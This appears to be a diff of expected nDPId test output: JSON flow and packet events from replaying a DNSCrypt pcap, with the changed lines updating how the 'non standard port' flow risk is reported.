 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":946739318168,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739318168,"pkt":"REREREREZmZmZmZmCABFAAIcuoVAAL0Rw2MKAAABwb+7a5HQAbsCCEABLy0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318168,"flow_last_seen":946739318168,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318168,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318168,"flow_last_seen":946739318168,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318168,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAIcuoZAAL0Rw2IKAAABwb+7a4wtAbsCCEABLysBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAXcuocgAL0R36EKAAABwb+7a4H\/AbsGBBdyLyoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":368,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAABQuocAub0RBHUKAAABwb+7awAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":368,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAXcuokgAL0R358KAAABwb+7a9PHAbsGBMWnLywBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAXcuoggAL0R36AKAAABwb+7a7+QAbsGBNniLygBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":371,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAABQuokAub0RBHMKAAABwb+7awAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":371,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":372,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAABQuogAub0RBHQKAAABwb+7awAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":372,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
